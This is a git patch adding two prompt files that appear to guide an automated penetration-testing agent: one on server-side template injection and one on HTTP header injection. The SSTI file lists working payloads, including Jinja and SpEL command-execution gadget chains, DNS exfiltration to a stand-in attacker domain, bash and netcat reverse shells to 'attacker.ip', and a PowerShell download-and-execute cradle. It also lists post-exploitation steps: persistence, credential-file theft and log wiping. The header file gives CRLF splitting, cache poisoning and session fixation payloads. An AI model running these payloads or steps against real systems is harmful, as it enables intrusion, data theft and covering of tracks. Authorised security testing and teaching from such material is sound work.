From 03183add9e34163c46bd4fe3f9a1c8ba7041ff7b Mon Sep 17 00:00:00 2001 From: Modark Date: Fri, 12 Dec 2025 11:24:32 +0330 Subject: [PATCH 1/2] Add SSTI vulnerability guide --- .../server_side_template_injection.jinja | 226 ++++++++++++++++++ 1 file changed, 226 insertions(+) create mode 100644 strix/prompts/vulnerabilities/server_side_template_injection.jinja diff --git a/strix/prompts/vulnerabilities/server_side_template_injection.jinja b/strix/prompts/vulnerabilities/server_side_template_injection.jinja new file mode 100644 index 00000000..543491dd --- /dev/null +++ b/strix/prompts/vulnerabilities/server_side_template_injection.jinja @@ -0,0 +1,226 @@ + +SERVER-SIDE TEMPLATE INJECTION (SSTI) + +SSTI occurs when user input reaches template engines without sanitization, enabling expression evaluation, object traversal, and code execution. Modern engines are complex: subtle syntax differences, filter chains, and gadget availability differ across Jinja/Mako/Velocity/Smarty/Freemarker/Thymeleaf/Handlebars/EJS/ERB/Haml. Treat every user-controlled rendering as code execution until proven isolated. + + +- Web/API endpoints rendering templates with dynamic input (emails, PDFs, HTML, reports) +- Template languages: Jinja2/Jinja, Mako, Velocity, Smarty, Freemarker, Thymeleaf, Handlebars, EJS, ERB, Haml, Twig, Nunjucks, Marko, Dust +- CMS/static site generators and their theme engines +- No-code/low-code platforms with user-supplied templates +- Microtemplate injections in smaller DSLs and expression languages +- YAML/TOML/JSON deserialization triggering template evaluation + + + +1. Identify injection points: user input in template rendering paths (email subjects/bodies, report headers, documentation, theme customization, dynamic HTML fragments, API response formatting). +2. Establish context: which template engine, version, config (autoescape, filters, imports, globals), sandboxing. Compare error messages and timing between payloads. +3. Start with blind probes: mathematical expressions ({% raw %}{{7*7}}{% endraw %}, {% raw %}<%= 3+4 %>{% endraw %}, ${7*7}) and string concatenation to differentiate template syntax. +4. Escalate to object/attribute access ({% raw %}{{self}}{% endraw %}, {% raw %}{{request.application}}{% endraw %}, {% raw %}<%= system %>{% endraw %}) and method invocation. +5. Chain to RCE: gadget chains, subprocess access, file operations, environment variable exfiltration. Validate on multiple instances and configs. + + + + +- Form fields, query strings, headers (User-Agent, Referer, X-* custom), cookies, JSON bodies, GraphQL variables +- File uploads (filename, metadata processed through template), email/SMS fields (to, subject, body, template selection) +- API response formatting (pagination strings, filter expressions, aggregation labels, report titles) +- Configuration/theme endpoints (CSS/JS generation, HTML exports, webhook templates, notification formats) +- Hidden fields in responses (X-Template, X-Engine headers, HTML comments with engine hints, JavaScript frameworks detecting template syntax) + + + +- Math: {% raw %}{{7*7}}{% endraw %}, {% raw %}${7*7}{% endraw %}, {% raw %}<%= 7*7 %>{% endraw %}, {% raw %}<%=7*7%>{% endraw %}, {{7*7}}, [=7*7=], <% 7*7 %>, #{7*7} +- String concat: {% raw %}{{7*'7'}}{% endraw %}, {% raw %}${7*'7'}{% endraw %}, {% raw %}<%= 7*'7' %>{% endraw %}, {7*'7'}, [7*'7'] +- Reflection: {% raw %}{{self}}{% endraw %}, {% raw %}${self}{% endraw %}, {% raw %}<%= self %>{% endraw %}, {{ app }}, {{ env }} +- Delays: {% raw %}{{7*7}}|default:sleep(5){% endraw %}, {% raw %}${Runtime.getRuntime().exec('sleep 5')}{% endraw %}, <% system('sleep 5') %> + + + +- Numeric: confirmed via length change, ETag diff, or response delay match +- String: output appears verbatim or in predictable location (response body, error page, email preview) +- Error-based: exception names, stack frames, template directive syntax revealed +- Timing: secondary coercion or loop to introduce measurable latency +- Header injection: injected into Set-Cookie, Location, Content-Disposition via template variable + + + +- Syntax diff tests: {% raw %}{{var}}{% endraw %} vs <%= var %> vs ${var} vs [=var=] vs {%var%} +- Filter syntax: pipe (|), colon (:), space, semicolon +- Loop/block syntax: {% raw %}{% for %}{% endraw %} vs <% for %> vs [% for %] +- Comment markers: {# #}, <%# %>, /**/ +- Error messages: version string, engine name, file path, context variables leaked +- Response headers: X-Template-Engine, X-Renderer, Server variant +- Performance/timing deltas between similar payloads (cached vs fresh template compile) + + + + + +- Expression result rendered inline (visible in response body, email, PDF) +- Modified HTML structure detectable via diff/MutationObserver + + + +- Coerce syntax/type errors leaking context, stack trace, engine version, accessible objects +- Invalid filter/function names → list of available filters +- Object traversal errors revealing parent scope hierarchy + + + +- Loops: {% raw %}{%for i in range(1000000)%}{%endfor%}{% endraw %}, ${#set($x=0)}<% (0..1000000).each {$x++} %> +- Sleep: {% raw %}{{self.__init__.__globals__.__builtins__.__import__('time').sleep(5)}}{% endraw %}, <%= `sleep 5` %>, ${T(java.lang.Runtime).getRuntime().exec('sleep 5')} +- Recursive traversal of deep object chains +- Heavy computation: regex backtracking, string operations on huge strings + + + +- DNS exfiltration via {% raw %}{{self.__init__.__globals__.__builtins__.__import__('socket').gethostbyname('$(whoami).attacker.tld')}}{% endraw %} or equivalent per engine +- HTTP callback via template fetching external URL or command execution piped to curl +- Blind gadget chain confirmation via response length/ETag diff when side-effect triggers + + + + + +- Object/attribute traversal: {% raw %}{{self}}{% endraw %}, {% raw %}{{self.__dict__}}{% endraw %}, {% raw %}{{self.__init__.__globals__}}{% endraw %} +- Builtin access: {% raw %}{{self.__init__.__globals__.__builtins__}}{% endraw %}, {% raw %}{{cycler.__init__.__globals__.os.popen('id').read()}}{% endraw %} +- {% raw %}{{'__import__'.__class__.__mro__[1].__subclasses__()}}{% endraw %} to enumerate all classes → locate subprocess/popen/open +- Filter chains: {% raw %}{{ payload|string|replace('x','y') }}{% endraw %} → filter composition for payload mutation +- Namespace pollution: {% raw %}{% for x in y.__dict__ %}{% endraw %} to leak attributes when iteration supported +- Macro nesting and recursion for computational gadgets +- Safe string wrappers bypass: {% raw %}{{Markup(dangerous)}}{% endraw %}, {% raw %}{{value|safe}}{% endraw %} if autoescape disabled + + + +- Silent null-deref for blind enumeration: ${obj.method()}, #set($x = $obj.method()) +- Class access: ${{}}, ${''.class}, ${Class.forName('java.lang.Runtime')}, #set($rt = $Runtime.getRuntime()) +- Method invocation chain: ${Runtime.getRuntime().exec('id')} +- Built-in variables: ${.version}, ${.data_model}, ${.globals} +- Macro definition for loop-based gadget chains: #macro(brute)#foreach($c in $rt)...#end#end + + + +- Ruby code eval: <%= system('id') %>, <% exec('bash -c "..."') %>, <% `command` %> +- Object access: <%= self.class %>, <%= Object.constants %>, <%= Gem.loaded_specs %> +- Require/load: <%= require('socket'); TCPSocket.new(...) %> +- Unsafe string interpolation: #{"#{7*7}"} + + + +- Smarty: {php}$_POST['x']{/php}, {assign var=x value=$smarty.server.PHP_SELF}, {$smarty.ldelim}{$smarty.rdelim} +- Twig: {{ _self }}, {{ self }}, {{ cycles }}, {% raw %}{% macro test() %}{% endmacro %}{% endraw %} +- PHP filter chains: {{ string|replace|reverse|upper }}, passing payloads through multiple filters +- Namespace traversal: Smarty plugin auto-load via template path, Twig Environment extension loading + + + +- SpEL (Spring Expression Language): ${T(java.lang.Runtime).getRuntime().exec('id')} +- Thymeleaf-specific variables: [[${#string.abbreviate(text,17)}]], /*[[${payload}]]*/ +- Inline expressions: [[${{payload}}]], [(${payload})] +- Attribute modification: th:text="${T(java.lang.Runtime).getRuntime().exec('touch /tmp/pwned')}" +- Conditional expressions with method chaining: [# th:if="${T(java.lang.System).getProperty('os.name')}"] + + + +- Handlebars: {{this}}, {{this.constructor}}, {{#each @root}} iteration over globals +- Nunjucks: {{ foo() }}, {% raw %}{% set x = cycler.__init__.__globals__ %}{% endraw %}, filter composition +- EJS: <%= process.env.FLAG %>, <% eval(Buffer.from(b64,'base64').toString()) %> +- Built-in object leakage: <%= Object.keys(this) %>, {{ Object.getOwnPropertyNames(Function.prototype) }} + + + +- YAML template engines: !!python/object/apply:os.system ["id"] +- TOML embedded expressions if parser supports evaluation +- JSON post-processing through template → inject via value interpolation +- Polyglot injection: JSON string containing template syntax evaluated downstream + + + +- Multi-engine contexts: template output fed to second engine; craft payload valid for both +- Format string → template: printf-style format strings evaluated as template expressions +- Markdown/reStructuredText with embedded template/code block syntax +- SVG/HTML templating: namespace confusion between template tags and HTML/SVG elements + + + +- Encoding layering: URL → JSON → template, or template → HTML-encoded → browser decode → JS eval +- Case and whitespace: {% raw %}{{7*7}}{% endraw %} vs {{7 *7}} vs {{ 7*7 }} vs {{7*7}} +- Comment stripping vs evaluation: injection before/after template comment parsing +- Directive reordering: {% raw %}{% set x=1 %}{% endraw %} vs inline vs post-evaluation +- Filter/function aliasing: same function via different names or namespace collisions +- Operator precedence abuse: ((7*7)), 7 * 7, 7*7, 7 **7 +- Null byte injection: {{ x%00y }}, terminating template processing early +- Unicode normalization: смарт-кавычки (smart quotes) vs ASCII quotes confusing parsers +- Variable shadowing: injection of reserved keywords or locals that override globals + + + +- Enumerate all accessible classes: {% raw %}{%for c in [].constructor.__init__.__globals__.values()%}{%if c.__name__=='__loader__'%}{{c.__self__}}{%endif%}{%endfor%}{% endraw %} +- Process/subprocess gadgets: Runtime, ProcessBuilder, exec, system, backticks, %x{}, system(), popen() +- File I/O gadgets: open(), fopen(), file_get_contents(), readFile(), File.read() +- Network gadgets: socket, HTTP client, curl, wget, nc +- Reflection gadgets: Class.forName(), getClass(), .__class__, constructor.prototype +- Serialization/deserialization gadgets: ObjectInputStream, pickle, deserialize() +- Import/require gadgets: __import__(), require(), include, load, exec(), eval() + + + +- Deleted builtins restoration: {% raw %}{{[].__class__.__base__.__subclasses__()}}{% endraw %} to walk inheritance +- Whitelist bypass: inject via attribute lookup instead of direct function reference +- Implicit conversion: coerce object to string/number/boolean triggering __str__/__tostring__ with injected code +- Iterator protocol: __iter__, __next__ abused for code execution during iteration +- Context manager protocol: __enter__, __exit__ invoked during with block evaluation +- Descriptor protocol: __get__, __set__, __delete__ triggered on attribute access +- Metaclass abuse: __new__, __init__ invoked during class instantiation +- Module introspection: sys.modules, importlib to load arbitrary code +- Bytecode injection: compile() and exec()/eval() with crafted bytecode + + + + +- Single-liner shells: /bin/bash -c, /bin/sh, Perl one-liner, Python -c, Ruby -e, Node.js -e +- Command substitution: $(cmd), `cmd`, {% raw %}{{os.popen('id').read()}}{% endraw %} +- Pipeline and redirection: | tee /tmp/x, && next_cmd, || fallback +- Reverse shell: bash -i >& /dev/tcp/attacker.ip/port 0>&1, nc attacker.ip port -e /bin/bash +- Alternative shells: /bin/ksh, /bin/tcsh, /bin/zsh +- Kernel exploits via template gadgets accessing /proc/sys + + + +- CMD: cmd /c command, cmd /C "command", for /l %i in (1,1,5) do command +- PowerShell: powershell -Command "code", pwsh -c {code}, powershell -enc [Base64], IEX (New-Object Net.WebClient).DownloadString('url') +- Windows API via .NET (Thymeleaf/SpEL context): Process.Start, System.Diagnostics.Process +- Scheduled task abuse: schtasks /create, at command (deprecated but sometimes present) + + + +- Direct subprocess: java.lang.Runtime, ProcessBuilder, System.exec(), os.spawn, fork+exec +- Interpreted evaluation: eval(), exec(), system(), popen() +- File write + inclusion: write web shell to webroot, then trigger inclusion/access +- Template function definition: define function inline that executes code on next invocation +- Unsafe deserialization chains: pickle, Java serialization, PHP unserialize() + + + + +- Environment variable extraction: env, environ, getenv, System.getenv +- File system reconnaissance: ls, dir, find, Get-ChildItem, file permissions, /proc/self/status +- Network access and lateral movement: curl/wget to internal services, DNS resolution of internal hosts +- Persistence mechanisms: cron jobs, scheduled tasks, service creation, SSH key installation, web shell +- Credential extraction: /etc/passwd, /etc/shadow (if readable), .ssh/authorized_keys, cloud metadata services +- Log and evidence removal: rm, del, Clear-EventLog, history -c + + + +- Email rendering engines and bulk mailers (template in TO/FROM/SUBJECT/BODY) +- PDF generators and report engines (server-side template rendering pre-conversion) +- CMS theme/plugin systems with user-supplied templates +- API response formatting and schema rendering +- Webhook payload templating and notification systems +- Code generation tools and build pipeline templates +- Search result templating and faceted search rendering +- Admin panels with template editing or preview functionality + + + From cd90d795888fc0df39b4ac773376bb58c891e046 Mon Sep 17 00:00:00 2001 From: Modark Date: Fri, 12 Dec 2025 11:28:52 +0330 Subject: [PATCH 2/2] Add Header Injection vulnerability --- .../vulnerabilities/header_injection.jinja | 238 ++++++++++++++++++ 1 file changed, 238 insertions(+) create mode 100644 strix/prompts/vulnerabilities/header_injection.jinja diff --git a/strix/prompts/vulnerabilities/header_injection.jinja b/strix/prompts/vulnerabilities/header_injection.jinja new file mode 100644 index 00000000..3e6993de --- /dev/null +++ b/strix/prompts/vulnerabilities/header_injection.jinja @@ -0,0 +1,238 @@ + +HTTP HEADER INJECTION + +Header injection enables response splitting, cache poisoning, session fixation, authentication bypass, and distributed attacks across proxies and caches. Treat every server-controlled header value as untrusted input until normalized and validated. User influence on response headers is as dangerous as code injection. + + +- Response header injection (Set-Cookie, Location, Content-Type, X-* custom headers) +- Request header manipulation (Host, X-Forwarded-*, User-Agent, Referer, Accept-Language, Authorization) +- Proxy/cache confusion via multiple header techniques +- CRLF injection enabling response splitting and smuggling +- HTTP/2 pseudo-header attacks +- Header parsing differentials across servers, proxies, and clients +- Log poisoning and security bypass via log-based detection evasion + + + +1. Inventory all server-controlled headers influenced by user input: redirects, cookies, content-type, content-disposition, custom X-* headers, error messages, rate-limit headers. +2. Test normalization: attempt newline injection (\n, \r, %0a, %0d, %0d%0a, URL-encoded variants, Unicode whitespace), null bytes, multi-byte sequences. +3. Establish a baseline response with a known payload; compare status, headers, body, caching directives, and intermediary behavior. +4. Probe parser differentials: same payload via different transports (HTTP/1.0, HTTP/1.1, HTTP/2, chunked encoding), case variance, leading/trailing whitespace. +5. Test multi-stage injection: injection site in query string vs body vs header, with secondary reflection into another header. + + + + +- Redirect endpoints (next, return, continue, goto, url, redirect_uri, referer echo) +- User-visible errors and custom error pages (user input echoed in HTTP 404/500 responses) +- File download endpoints (Content-Disposition filename, Content-Type inference from user input) +- API response headers (X-Page-Count, X-Total-Results, X-Query-Time derived from user input) +- Cache headers (Cache-Control, ETag, Last-Modified computed from user-supplied values) +- Authentication/session headers (Set-Cookie with user-derived domain, path, or value; WWW-Authenticate realm) +- Custom logging or tracking headers (X-Request-Id containing user input, X-Correlation-Id, X-User-Id) +- Webhook/callback URLs (Host, Referer, User-Agent in requests made by server) +- Rate-limit or quota headers (X-RateLimit-Remaining, X-RateLimit-Reset influenced by user) +- Proxy headers (X-Forwarded-For, X-Forwarded-Proto, X-Real-IP intended for trusted proxies but injectable) + + + +- Bare LF: %0a, 0x0a, \n +- Bare CR: %0d, 0x0d, \r +- CRLF: %0d%0a, %0a%0d, 0x0d0x0a, \r\n, \n\r +- Double encoding: %250d%250a, %252f%252e%252e +- Overlong UTF-8: %c0%8d%c0%8a (Cyrillic/overlong representations of control chars) +- Unicode line/paragraph separators: %e2%80%a8 (U+2028), %e2%80%a9 (U+2029) +- Mixed case: %0D%0A, %0a%0d +- Null termination: %00, trailing NUL coercing parser stop +- Mixed separators: %0a%0d%0a (LF CR LF), multiple separators to confuse parsers + + + +- HTTP/1.0 vs HTTP/1.1: message framing rules differ (presence of Content-Length vs Transfer-Encoding) +- Chunked transfer encoding: chunk delimiters followed by injected headers +- Multipart boundaries: CRLF after boundary resets parser state in some implementations +- HTTP/2 pseudo-header injection (:method, :path, :authority, :scheme) via header values +- Header field parsing: tolerance for leading/trailing whitespace, case insensitivity, multiple values +- Method override: X-HTTP-Method-Override, X-Method-Override respected by some frameworks +- Host header handling: Host vs X-Forwarded-Host precedence; port inclusion; IPv6 format confusion +- Server-side template evaluation of headers: header value processed through template engine + + + +- Multiple Content-Length headers: server vs proxy pick different one, leading to request smuggling +- Whitespace encoding: header-name: %20value vs header-name:%20value vs header-name : value +- Folding: RFC 2822 header folding (continuation lines) in HTTP context: deprecated but parsed differently across servers +- Tab injection: %09, often treated as whitespace or field separator, permitting header injections +- Null byte truncation: header-value\x00injected-header causes null termination in some parsers +- Case mangling: Header-Name vs header-name vs HEADER-NAME; cache key differs +- Leading dot or colon: .header-name, :header-name parsed inconsistently + + + +- Vary headers: inspect Vary, Via, X-Cache, X-Powered-By to infer caching layer and server +- Server response headers: Server, X-AspNet-Version, X-Served-By, CF-Ray (Cloudflare), X-Amzn-RequestId (AWS) +- Error pages: custom 404/500 with server version or tech stack hints +- Timing: response time deltas revealing caching behavior or backend processing +- Response length: same request → different lengths suggesting header injection serialized +- ETag changes: injected headers in response change cache key/ETag calculation + + + + + +- Injected header appears in response (Set-Cookie, Location, X-Custom, etc.) +- Secondary request receives injected value (cookie set, redirect followed, etc.) + + + +- Inject CRLF + empty line + attacker content; response parser treats attacker content as new response +- Observable via proxy/cache: two requests yield two responses, or cache returns injected response to unrelated request + + + +- Inject cache-busting payload: manipulate Vary, Cache-Control, ETag; secondary request from different user hits poisoned cache +- Observe via timing: first request slow, second request fast (cache hit with injected content) +- Test across proxy boundaries: Burp, mitmproxy, or real CDN caching injected payload + + + +- Set-Cookie injection: inject Domain, Path, Secure, HttpOnly, SameSite, Max-Age attributes +- Session identifier hijacking: inject SameSite=None + Secure to enable cross-site cookie theft +- Observe: browser sends injected cookie on subsequent same-origin requests; cross-site requests if SameSite=None + + + +- Host header injection: modify Host header or inject via user input reflected into response Host header +- Observe: password reset emails sent to attacker.com, CDN maps to attacker origin, OAuth redirects to attacker +- Compare responses: same path with different Host headers yields different content or redirects + + + +- Authorization header manipulation: inject bearer tokens, Basic auth, API keys into request or response +- Observe: unauthorized request succeeds after header injection; elevated privileges; different user accessed + + + +- Response time deltas reveal header processing: injected header with computation (regex, database lookup) vs simple header +- Retry-After header with large delay causing client-side pause +- Set-Cookie with future expiry vs past expiry affecting session state timing + + + +- Blind XXE/SSRF via injected Referer/User-Agent in webhook/logging sent to attacker server +- Open Redirect via Location header injection; client follows attacker-controlled URL +- DNS exfiltration via data encoded in Host/X-Forwarded-Host header parsed by logging/proxy infrastructure + + + + + +- Inject CRLF to terminate current response and begin new response under attacker control +- Payload: {% raw %}injectionpoint\r\n\r\n{% endraw %} +- Proxy/cache sees two responses; if cache key includes only first line, poisoned cache returns attacker response +- HTTP/2 servers may reject CRLF in header values (stricter parsing), but some intermediaries or backends accept +- Request smuggling via header injection: inject Content-Length header conflicting with Transfer-Encoding; proxy and backend parse differently + + + +- Vary header manipulation: Vary: Accept-Encoding injected → cache segregates by encoding not content +- X-Forwarded-* injection: X-Forwarded-Proto: https injected into HTTPS request; if cache key includes, HTTP requests hit HTTPS cache +- Age/Max-Age injection: set to 0 for cache bypass, or huge value for persistent poisoning +- Cache-Control: public injected into private responses, or private injected into public → cache behavior flip +- Etag collision: inject ETag matching another resource → conditional requests return wrong resource +- Set-Cookie for cache key: if cache includes cookies, inject Set-Cookie → cache entries segregate by attacker-chosen value + + + +- Domain/Path bypass: inject Domain=.attacker.com or Path=/ to widen cookie scope +- HttpOnly bypass: if Set-Cookie lacks HttpOnly, injected cookie accessible to JavaScript +- SameSite bypass: inject SameSite=None; Secure flag required but if HTTPS, enables cross-site cookie inclusion +- Secure flag bypass: inject Secure to force cookie over HTTPS only; if site has mixed HTTP/HTTPS, cookie inaccessible on HTTP +- Max-Age manipulation: inject Max-Age=-1 to immediately expire all cookies, or Max-Age=999999999 for persistent cookie +- Cookie jar collision: inject cookie with same name/domain/path as legitimate cookie → precedence determines which is sent + + + +- Location header injection: Redirect endpoint echoes user input into Location header; inject CRLF + new Location pointing to attacker +- Authorization header reflection: endpoints reflecting Authorization header in error responses; inject Authorization header via user input +- WWW-Authenticate header injection: inject custom realm or parameter; client-side password managers may store injected credentials +- Refresh header injection: inject Refresh: 0; url=attacker.com for JavaScript-free redirect +- X-Accel-Redirect header injection (Nginx): inject X-Accel-Redirect: /etc/passwd to serve internal files (if not properly validated) + + + +- X-Forwarded-For spoofing: inject X-Forwarded-For: 127.0.0.1 to bypass IP-based rate limiting or auth +- X-Forwarded-Proto injection: inject X-Forwarded-Proto: https to SSL-only validation even on HTTP connection +- X-Forwarded-Host injection: inject Host header or X-Forwarded-Host to cause password reset/OAuth tokens sent to attacker domain +- X-Real-IP injection: Nginx/Apache reverse proxy trusts X-Real-IP; inject attacker IP for logging bypass +- Forwarded header injection (RFC 7239): similar to X-Forwarded-*, but standardized; inject attacker IP/host +- Client-IP / CF-Connecting-IP injection: CloudFlare and others trust these headers; inject attacker IP + + + +- Content-Type injection: inject Content-Type: text/html into response served as application/json; browser sniffs and renders HTML → XSS +- Content-Encoding injection: inject Content-Encoding: gzip without actual gzip compression; browser fails to decompress, revealing raw content +- X-Content-Type-Options bypass: inject X-Content-Type-Options: nosniff into response; if server respects, then inject Content-Type for sniffing +- Charset injection: inject Content-Type: text/html; charset=utf-7; UTF-7 decoding may enable XSS via alternative encoding +- Content-Disposition abuse: inject Content-Disposition: inline for script execution, or attachment with executable extension + + + +- Location header XSS: inject Location: javascript:alert(1) or data:text/html, +- Set-Cookie with embedded script (if cookie processed as HTML): Set-Cookie: xss= +- X-Original-URL reflection: some apps reflect X-Original-URL in headers; inject XSS payload +- Referer header echo: if Referer echoed in error page via header, inject Referer: "> +- User-Agent or other request headers echoed into response headers or body → CRLF inject for splitting + + + +- Inject request headers that appear in access logs; attacker reads logs and runs commands +- Inject CRLF + fake log entries to obfuscate attack in logs +- Inject headers to defeat WAF: split payload across multiple headers, mix encodings, use header case variants +- X-Client-IP, X-Forwarded-For injection to spoof source IP in firewall logs +- User-Agent injection: inject malicious User-Agent to poison honeypot logs or SIEM correlation + + + +- Location header: inject Location: https://attacker.com directly if header user-controlled +- Refresh header: inject Refresh: 0; url=attacker.com +- Content-Location header (less common but still processed): inject Content-Location: https://attacker.com +- Link header with rel=next or rel=shortlink to attacker +- From header (uncommon) in specific protocols + + + +- Host header as DNS oracle: inject Host: attacker.tld; if logging or proxying includes Host resolution, DNS exfiltration possible +- X-Forwarded-Host DNS: similar to Host, if proxied service resolves header value +- Timing via Retry-After: server honors Retry-After header; inject large delay to affect client behavior +- Connection header abuse: inject Connection: close to close connection prematurely, or Connection: keep-alive to affect pipelining + + + +- Pseudo-header injection: :method, :path, :authority, :scheme are pseudo-headers in HTTP/2; some implementations allow injection via header values +- Header name normalization: HTTP/2 lowercases header names; inject using uppercase to bypass case-sensitive filters in HTTP/1.1 downgrade +- Continuation frame splitting: HEADERS frames with CONTINUATION frames; inject across frame boundaries + + + +- Proxy → backend mismatch: HTTP/1.1 proxy to HTTP/2 backend (or vice versa); same payload parsed as different requests +- Chunked vs Content-Length confusion: proxy sees chunked, backend sees Content-Length; request body interpretation differs +- Forwarded vs X-Forwarded-* precedence: if both present, different servers prioritize different one; inject via less-trusted header +- Case sensitivity in header names: some systems case-insensitive, others not; inject via case variant to evade filters + + + + +- Password reset and account recovery flows (Set-Cookie, Location, email headers) +- OAuth/SSO redirect endpoints (Location, Host header determines authorization server destination) +- Rate limiting and quota systems (X-RateLimit-* headers injected to bypass limits) +- API authentication (Authorization header, X-API-Key manipulation) +- Payment gateways and financial transactions (Location redirects, Set-Cookie for session fixation) +- Admin panels and internal tools (Host header confusion, X-Forwarded-* bypasses) +- CDN and WAF bypass (cache poisoning, header smuggling to evade detection) +- Multi-tenant isolation (Host header, X-Tenant-Id injection to cross tenant boundaries) +- Logging and monitoring bypass (X-Forwarded-For spoofing, User-Agent poisoning) +- Email systems (Injecting headers into notification/alert emails sent by server) + + +